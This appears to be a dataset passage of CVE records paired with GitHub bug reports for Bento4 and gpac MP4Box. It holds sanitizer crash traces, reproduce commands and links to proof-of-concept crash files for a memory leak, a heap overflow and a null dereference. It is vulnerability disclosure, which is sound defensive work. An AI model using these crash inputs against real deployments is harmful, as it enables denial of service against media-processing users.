/home/ubuntu/lab/Bento4_AFL/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250:22 #4 0x7f3f8e9ddd8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 Indirect leak of 176 byte(s) in 2 object(s) allocated from: #0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049) #1 0x55cf6ecdcff5 in AP4_Track::AP4_Track(AP4_TrakAtom&, AP4_ByteStream&, unsigned int) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4Track.cpp:242:25 Indirect leak of 48 byte(s) in 2 object(s) allocated from: #0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049) #1 0x55cf6eca4bec in AP4_List<AP4_Track>::Add(AP4_Track*) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4List.h:160:16 Indirect leak of 48 byte(s) in 1 object(s) allocated from: #0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049) #1 0x55cf6ed1eac1 in AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) /home/ubuntu/lab/Bento4_AFL/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:175:14 #2 0x55cf6ec89b79 in main /home/ubuntu/lab/Bento4_AFL/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:236:14 #3 0x7f3f8e9ddd8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 Indirect leak of 40 byte(s) in 1 object(s) allocated from: #0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049) #1 0x55cf6eca3029 in AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4Movie.cpp:114:28 Indirect leak of 40 byte(s) in 1 object(s) allocated from: #0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049) #1 0x55cf6eca3029 in AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4Movie.cpp:114:28 #2 0x55cf6ec9aa78 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4File.cpp:78:5 #3 0x55cf6ec89c8e in main /home/ubuntu/lab/Bento4_AFL/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250:22 #4 0x7f3f8e9ddd8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 SUMMARY: AddressSanitizer: 416 byte(s) leaked in 8 allocation(s). ``` * stderr (valgrind) ``` ==8898== Memcheck, a memory error detector ==8898== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al. ==8898== Using Valgrind-3.18.1 and LibVEX; rerun with -h for copyright info ==8898== Command: ./mp42aac /home/ubuntu/lab/Bento4/crashes/id_000006,sig_06,src_000004,time_55114263,execs_1191083,op_flip1,pos_1217 out ==8898== ERROR: no audio track found ==8898== ==8898== HEAP SUMMARY: ==8898== in use at exit: 888 bytes in 9 blocks ==8898== total heap usage: 200 allocs, 191 frees, 93,975 bytes allocated ==8898== ==8898== 48 bytes in 1 blocks are indirectly lost in loss record 1 of 6 ==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) ==8898== by 0x192D1E: AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x193178: AP4_FileByteStream::Create(char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x16FE68: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== ==8898== 48 bytes in 2 blocks are indirectly lost in loss record 2 of 6 ==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) ==8898== by 0x175298: AP4_List<AP4_Track>::Add(AP4_Track*) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x174AED: AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172FC7: AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172DE6: AP4_File::AP4_File(AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x16FF07: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== ==8898== 80 bytes in 2 blocks are indirectly lost in loss record 3 of 6 ==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) ==8898== by 0x174AB8: AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172FC7: AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172DE6: AP4_File::AP4_File(AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x16FF07: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== ==8898== 176 bytes in 2 blocks are indirectly lost in loss record 4 of 6 ==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) ==8898== by 0x184E1D: AP4_Track::AP4_Track(AP4_TrakAtom&, AP4_ByteStream&, unsigned int) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x174AD2: AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172FC7: AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172DE6: AP4_File::AP4_File(AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x16FF07: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== ==8898== 416 (64 direct, 352 indirect) bytes in 1 blocks are definitely lost in loss record 5 of 6 ==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) ==8898== by 0x172FAD: AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172DE6: AP4_File::AP4_File(AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x16FF07: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== ==8898== 472 bytes in 1 blocks are still reachable in loss record 6 of 6 ==8898== at 0x4848899: malloc (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) ==8898== by 0x4B2C64D: __fopen_internal (iofopen.c:65) ==8898== by 0x4B2C64D: fopen@@GLIBC_2.2.5 (iofopen.c:86) ==8898== by 0x192B2A: fopen_s(_IO_FILE**, char const*, char const*) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x192C58: AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x193178: AP4_FileByteStream::Create(char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x16FE68: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== ==8898== LEAK SUMMARY: ==8898== definitely lost: 64 bytes in 1 blocks ==8898== indirectly lost: 352 bytes in 7 blocks ==8898== possibly lost: 0 bytes in 0 blocks ==8898== still reachable: 472 bytes in 1 blocks ==8898== suppressed: 0 bytes in 0 blocks ==8898== ==8898== For lists of detected and suppressed errors, rerun with: -s ==8898== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) ``` ### Analysis https://github.com/axiomatic-systems/Bento4/blob/1529b83f89d52958b811469fc3ac5206639a3d0f/Source/C%2B%2B/Core/Ap4Movie.cpp#L117-L123 On `AP4_Movie::AP4_Movie`, parsing tracks and added into m_Tracks list, but it seems that mp42aac cannot correctly delete when we got an `no audio track found` error. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted mp4 file. --- end body --- comments : --- start comments --- --- end comments ---
10,694
CVE-2023-46426
2024-03-09T06:15:50.637
Heap-based Buffer Overflow vulnerability in gpac version 2.3-DEV-rev588-g7edc40fee-master, allows remote attackers to execute arbitrary code and cause a denial of service (DoS) via gf_fwrite component in at utils/os_file.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/gpac/gpac/issues/2642" } ]
null
null
[ "gpac", "gpac" ]
Issue
# Description heap-buffer-overflow in gf_fwrite at utils/os_file.c:1657 # Version ``` git log commit 7edc40feef23efd8c9948292d269eae76fa475af (HEAD -> master, origin/master, origin/HEAD) Author: jeanlf <jeanlf@gpac.io> Date: Thu Oct 12 16:58:53 2023 +0200 ./bin/gcc/MP4Box -version MP4Box - GPAC version 2.3-DEV-rev588-g7edc40fee-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io ``` # POC https://github.com/Janette88/test_pocs/blob/main/hbo16 # Reproduce ``` ./bin/gcc/MP4Box -dash 1000 /home/fuzz/crashes/hbo16 [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) ================================================================= ==60235==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000025d1 at pc 0x7ffff75ed1bd bp 0x7ffffffec720 sp 0x7ffffffebec8 READ of size 53248 at 0x6020000025d1 thread T0 #0 0x7ffff75ed1bc in __interceptor_fwrite ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1103 #1 0x7ffff3ba5226 in gf_fwrite utils/os_file.c:1657 #2 0x7ffff4655f98 in swf_def_bits_jpeg scene_manager/swf_parse.c:2087 #3 0x7ffff46576d4 in swf_process_tag scene_manager/swf_parse.c:2374 #4 0x7ffff46576d4 in swf_parse_tag scene_manager/swf_parse.c:2405 #5 0x7ffff4d55ed9 in gf_text_process_swf filters/load_text.c:2550 #6 0x7ffff4d55ed9 in gf_text_process_swf filters/load_text.c:2527 #7 0x7ffff4d6b4f3 in txtin_process filters/load_text.c:4015 #8 0x7ffff4a5d4ae in gf_filter_process_task filter_core/filter.c:2971 #9 0x7ffff4a2ab11 in gf_fs_thread_proc filter_core/filter_session.c:2105 #10 0x7ffff4a2f8b6 in gf_fs_run filter_core/filter_session.c:2405 #11 0x7ffff43bc0bd in gf_dasher_process media_tools/dash_segmenter.c:1236 #12 0x555555621d26 in do_dash /home/fuzz/gpac/applications/mp4box/mp4box.c:4831 #13 0x555555621d26 in mp4box_main /home/fuzz/gpac/applications/mp4box/mp4box.c:6245 #14 0x7ffff164c082 in __libc_start_main ../csu/libc-start.c:308 #15 0x5555555fa05d in _start (/home/fuzz/gpac/bin/gcc/MP4Box+0xa605d) 0x6020000025d1 is located 0 bytes to the right of 1-byte region [0x6020000025d0,0x6020000025d1) allocated by thread T0 here: #0 0x7ffff7690808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x7ffff465a345 in swf_def_hdr_jpeg scene_manager/swf_parse.c:2044 #2 0x7ffff465a345 in swf_process_tag scene_manager/swf_parse.c:2372 #3 0x7ffff465a345 in swf_parse_tag scene_manager/swf_parse.c:2405 #4 0x7ffff4d55ed9 in gf_text_process_swf filters/load_text.c:2550 #5 0x7ffff4d55ed9 in gf_text_process_swf filters/load_text.c:2527 #6 0x7ffff4d6b4f3 in txtin_process filters/load_text.c:4015 #7 0x7ffff4a5d4ae in gf_filter_process_task filter_core/filter.c:2971 #8 0x7ffff4a2ab11 in gf_fs_thread_proc filter_core/filter_session.c:2105 #9 0x7ffff4a2f8b6 in gf_fs_run filter_core/filter_session.c:2405 #10 0x7ffff43bc0bd in gf_dasher_process media_tools/dash_segmenter.c:1236 #11 0x555555621d26 in do_dash /home/fuzz/gpac/applications/mp4box/mp4box.c:4831 #12 0x555555621d26 in mp4box_main /home/fuzz/gpac/applications/mp4box/mp4box.c:6245 #13 0x7ffff164c082 in __libc_start_main ../csu/libc-start.c:308 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1103 in __interceptor_fwrite Shadow bytes around the buggy address: 0x0c047fff8460: fa fa fd fa fa fa 00 00 fa fa 00 00 fa fa fd fa 0x0c047fff8470: fa fa fd fd fa fa fd fa fa fa 00 07 fa fa 00 07 0x0c047fff8480: fa fa 04 fa fa fa 00 05 fa fa 00 00 fa fa 00 00 0x0c047fff8490: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff84a0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 =>0x0c047fff84b0: fa fa 00 00 fa fa 00 00 fa fa[01]fa fa fa fa fa 0x0c047fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff84d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff84f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==60235==ABORTING ``` # Impact This vulnerability allows a remote attacker to cause a denial of service or even arbitrary code execution on an affected gpac MP4Box. Exploiting this vulnerability requires user interaction, as the target must access a malicious page or open a malicious file. # Credit Janette88 (Jq Wang)
heap-buffer-overflow in gf_fwrite at utils/os_file.c:1657
https://api.github.com/repos/gpac/gpac/issues/2642/comments
1
2023-10-13T09:11:40Z
2024-03-10T19:44:37Z
https://github.com/gpac/gpac/issues/2642
1,941,560,024
2,642
[ -0.049831703305244446, -0.002920901868492365, -0.015107816085219383, 0.022128304466605186, 0.04129699245095253, 0.02703232318162918, -0.02152605727314949, 0.0398515984416008, -0.02223154716193676, 0.040574293583631516, 0.020115075632929802, 0.015968170017004013, 0.028374474495649338, -0.00...
1,120
This is a GitHub Issue repo:gpac owner:gpac Title : heap-buffer-overflow in gf_fwrite at utils/os_file.c:1657 Issue date: --- start body --- # Description heap-buffer-overflow in gf_fwrite at utils/os_file.c:1657 # Version ``` git log commit 7edc40feef23efd8c9948292d269eae76fa475af (HEAD -> master, origin/master, origin/HEAD) Author: jeanlf <jeanlf@gpac.io> Date: Thu Oct 12 16:58:53 2023 +0200 ./bin/gcc/MP4Box -version MP4Box - GPAC version 2.3-DEV-rev588-g7edc40fee-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io ``` # POC https://github.com/Janette88/test_pocs/blob/main/hbo16 # Reproduce ``` ./bin/gcc/MP4Box -dash 1000 /home/fuzz/crashes/hbo16 [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) [SWF Parsing] tag PlaceObject over-read of 4 bytes (size 1) (frame 1) ================================================================= ==60235==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000025d1 at pc 0x7ffff75ed1bd bp 0x7ffffffec720 sp 0x7ffffffebec8 READ of size 53248 at 0x6020000025d1 thread T0 #0 0x7ffff75ed1bc in __interceptor_fwrite ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1103 #1 0x7ffff3ba5226 in gf_fwrite utils/os_file.c:1657 #2 0x7ffff4655f98 in swf_def_bits_jpeg scene_manager/swf_parse.c:2087 #3 0x7ffff46576d4 in swf_process_tag scene_manager/swf_parse.c:2374 #4 0x7ffff46576d4 in swf_parse_tag scene_manager/swf_parse.c:2405 #5 0x7ffff4d55ed9 in gf_text_process_swf filters/load_text.c:2550 #6 0x7ffff4d55ed9 in gf_text_process_swf filters/load_text.c:2527 #7 0x7ffff4d6b4f3 in txtin_process filters/load_text.c:4015 #8 0x7ffff4a5d4ae in gf_filter_process_task filter_core/filter.c:2971 #9 0x7ffff4a2ab11 in gf_fs_thread_proc filter_core/filter_session.c:2105 #10 0x7ffff4a2f8b6 in gf_fs_run filter_core/filter_session.c:2405 #11 0x7ffff43bc0bd in gf_dasher_process media_tools/dash_segmenter.c:1236 #12 0x555555621d26 in do_dash /home/fuzz/gpac/applications/mp4box/mp4box.c:4831 #13 0x555555621d26 in mp4box_main /home/fuzz/gpac/applications/mp4box/mp4box.c:6245 #14 0x7ffff164c082 in __libc_start_main ../csu/libc-start.c:308 #15 0x5555555fa05d in _start (/home/fuzz/gpac/bin/gcc/MP4Box+0xa605d) 0x6020000025d1 is located 0 bytes to the right of 1-byte region [0x6020000025d0,0x6020000025d1) allocated by thread T0 here: #0 0x7ffff7690808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x7ffff465a345 in swf_def_hdr_jpeg scene_manager/swf_parse.c:2044 #2 0x7ffff465a345 in swf_process_tag scene_manager/swf_parse.c:2372 #3 0x7ffff465a345 in swf_parse_tag scene_manager/swf_parse.c:2405 #4 0x7ffff4d55ed9 in gf_text_process_swf filters/load_text.c:2550 #5 0x7ffff4d55ed9 in gf_text_process_swf filters/load_text.c:2527 #6 0x7ffff4d6b4f3 in txtin_process filters/load_text.c:4015 #7 0x7ffff4a5d4ae in gf_filter_process_task filter_core/filter.c:2971 #8 0x7ffff4a2ab11 in gf_fs_thread_proc filter_core/filter_session.c:2105 #9 0x7ffff4a2f8b6 in gf_fs_run filter_core/filter_session.c:2405 #10 0x7ffff43bc0bd in gf_dasher_process media_tools/dash_segmenter.c:1236 #11 0x555555621d26 in do_dash /home/fuzz/gpac/applications/mp4box/mp4box.c:4831 #12 0x555555621d26 in mp4box_main /home/fuzz/gpac/applications/mp4box/mp4box.c:6245 #13 0x7ffff164c082 in __libc_start_main ../csu/libc-start.c:308 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1103 in __interceptor_fwrite Shadow bytes around the buggy address: 0x0c047fff8460: fa fa fd fa fa fa 00 00 fa fa 00 00 fa fa fd fa 0x0c047fff8470: fa fa fd fd fa fa fd fa fa fa 00 07 fa fa 00 07 0x0c047fff8480: fa fa 04 fa fa fa 00 05 fa fa 00 00 fa fa 00 00 0x0c047fff8490: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff84a0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 =>0x0c047fff84b0: fa fa 00 00 fa fa 00 00 fa fa[01]fa fa fa fa fa 0x0c047fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff84d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff84f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==60235==ABORTING ``` # Impact This vulnerability allows a remote attacker to cause a denial of service or even arbitrary code execution on an affected gpac MP4Box. Exploiting this vulnerability requires user interaction, as the target must access a malicious page or open a malicious file. # Credit Janette88 (Jq Wang) --- end body --- comments : --- start comments --- --- end comments ---
7,129
CVE-2023-46427
2024-03-09T06:15:50.740
An issue was discovered in gpac version 2.3-DEV-rev588-g7edc40fee-master, allows remote attackers to execute arbitrary code, cause a denial of service (DoS), and obtain sensitive information via null pointer deference in gf_dash_setup_period component in media_tools/dash_client.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/gpac/gpac/issues/2641" } ]
null
null
[ "gpac", "gpac" ]
Issue
# Description Null pointer deference in gf_dash_setup_period at media_tools/dash_client.c:6333 # Version ``` git log commit 7edc40feef23efd8c9948292d269eae76fa475af (HEAD -> master, origin/master, origin/HEAD) Author: jeanlf <jeanlf@gpac.io> Date: Thu Oct 12 16:58:53 2023 +0200 ./bin/gcc/MP4Box -version MP4Box - GPAC version 2.3-DEV-rev588-g7edc40fee-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io ``` # Poc : https://github.com/Janette88/test_pocs/blob/main/poc15 # Reproduce ``` compile: ./configure --enable-sanitizer make ``` ``` ./bin/gcc/MP4Box -dash 1000 /home/fuzz/crashes/poc15 [DASH] Updated manifest: P#1: start 0 - duration 0 - xlink none [DASH] Manifest after update: P#1: start 0 - duration 0 - xlink none [DASH] Setting up period start 0 duration 0 xlink none ID DID1 media_tools/dash_client.c:6333:9: runtime error: null pointer passed as argument 1, which is declared to never be null ``` ``` Asan log: ./bin/gcc/MP4Box -dash 1000 /home/fuzz/crash/poc15 [DASH] Updated manifest: P#1: start 0 - duration 0 - xlink none [DASH] Manifest after update: P#1: start 0 - duration 0 - xlink none [DASH] Setting up period start 0 duration 0 xlink none ID DID1 AddressSanitizer:DEADLYSIGNAL ================================================================= ==2807995==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000043f7e0 bp 0x7ffe04691450 sp 0x7ffe04690bf0 T0) ==2807995==The signal is caused by a READ memory access. ==2807995==Hint: address points to the zero page. #0 0x43f7e0 in strcmp (/home/fuzz/gpac/gpac/bin/gcc/MP4Box+0x43f7e0) #1 0x7fe80797751b in gf_dash_setup_period (/home/fuzz/gpac/gpac/bin/gcc/libgpac.so.12+0xd4851b) #2 0x7fe80792b0be in gf_dash_process (/home/fuzz/gpac/gpac/bin/gcc/libgpac.so.12+0xcfc0be) #3 0x7fe807fc31d3 in dashdmx_process (/home/fuzz/gpac/gpac/bin/gcc/libgpac.so.12+0x13941d3) #4 0x7fe807e90d3e in gf_filter_process_task (/home/fuzz/gpac/gpac/bin/gcc/libgpac.so.12+0x1261d3e) #5 0x7fe807e5ed86 in gf_fs_thread_proc (/home/fuzz/gpac/gpac/bin/gcc/libgpac.so.12+0x122fd86) #6 0x7fe807e5d67f in gf_fs_run (/home/fuzz/gpac/gpac/bin/gcc/libgpac.so.12+0x122e67f) #7 0x7fe8077fb9e7 in gf_dasher_process (/home/fuzz/gpac/gpac/bin/gcc/libgpac.so.12+0xbcc9e7) #8 0x50205c in do_dash /home/fuzz/gpac/gpac/applications/mp4box/mp4box.c:4831:15 #9 0x4f34ee in mp4box_main /home/fuzz/gpac/gpac/applications/mp4box/mp4box.c:6245:7 #10 0x7fe8068b0082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x42ad4d in _start (/home/fuzz/gpac/gpac/bin/gcc/MP4Box+0x42ad4d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/home/fuzz/gpac/gpac/bin/gcc/MP4Box+0x43f7e0) in strcmp ==2807995==ABORTING ``` # Impact: The vulnerability can potentially cause a crash or other effects. # Credit: Janette88 (Jq Wang)
Null pointer deference in gf_dash_setup_period at media_tools/dash_client.c:6333
https://api.github.com/repos/gpac/gpac/issues/2641/comments
1
2023-10-13T08:54:46Z
2024-03-10T19:46:45Z
https://github.com/gpac/gpac/issues/2641
1,941,533,993
2,641
[ -0.04704863578081131, 0.016906224191188812, -0.009137483313679695, 0.014161218889057636, 0.02298283763229847, -0.001406345167197287, -0.03453442081809044, 0.04382983595132828, -0.022290946915745735, 0.0027675668243318796, -0.01944817416369915, -0.007283664774149656, 0.014537246897816658, -...
1,121
